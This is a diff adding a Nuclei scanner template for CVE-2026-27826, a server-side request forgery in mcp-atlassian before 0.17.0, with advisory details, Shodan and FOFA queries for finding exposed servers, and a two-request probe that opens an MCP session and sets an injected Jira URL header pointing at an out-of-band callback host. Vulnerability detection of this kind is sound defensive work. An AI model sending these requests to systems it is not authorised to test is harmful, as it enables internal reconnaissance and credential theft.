diff --git a/http/cves/2026/CVE-2026-27826.yaml b/http/cves/2026/CVE-2026-27826.yaml new file mode 100644 index 000000000000..688b668f2022 --- /dev/null +++ b/http/cves/2026/CVE-2026-27826.yaml @@ -0,0 +1,77 @@ +id: CVE-2026-27826 + +info: + name: mcp-atlassian < 0.17.0 - SSRF + author: eyangfeng88-arch + severity: high + description: | + MCP Atlassian < 0.17.0 contains a server-side request forgery caused by improper validation of custom HTTP headers in the HTTP middleware, letting unauthenticated attackers force outbound requests to arbitrary URLs, exploit requires access to the mcp-atlassian HTTP endpoint. + impact: | + Unauthenticated attackers can make the server send requests to arbitrary URLs, enabling internal network reconnaissance and potential credential theft. + remediation: | + Upgrade to version 0.17.0 or later. + reference: + - https://pluto.security/blog/mcpwnfluence-cve-2026-27825-critical/ + - https://github.com/sooperset/mcp-atlassian/security/advisories/GHSA-7r34-79r5-rcc9 + - https://github.com/sooperset/mcp-atlassian/pull/986 + - https://nvd.nist.gov/vuln/detail/CVE-2026-27826 + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N + cvss-score: 8.2 + cve-id: CVE-2026-27826 + cwe-id: CWE-918 + metadata: + verified: true + max-request: 2 + vendor: sooperset + product: mcp-atlassian + shodan-query: http.html:"Atlassian MCP" + fofa-query: body="Atlassian MCP" || header="mcp-session-id" + tags: cve,cve2026,mcp,atlassian,ssrf,oast + +flow: http(1) && http(2) + +http: + - raw: + - | + POST /mcp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Accept: application/json, text/event-stream + + {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"nuclei","version":"1.0"}}} + + extractors: + - type: regex + name: session_id + part: header + internal: true + group: 1 + regex: + - '(?i)Mcp-Session-Id:\s*([a-f0-9]+)' + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'len(session_id) > 0' + condition: and + internal: true + + - raw: + - | + POST /mcp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Accept: application/json, text/event-stream + Mcp-Session-Id: {{session_id}} + X-Atlassian-Jira-Url: http://{{interactsh-url}} + X-Atlassian-Jira-Personal-Token: nuclei-ssrf-test + + {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"jira_get_issue","arguments":{"issue_key":"TEST-1"}}} + + matchers: + - type: dsl + dsl: + - 'contains(interactsh_protocol, "dns") || contains(interactsh_protocol, "http")' + condition: and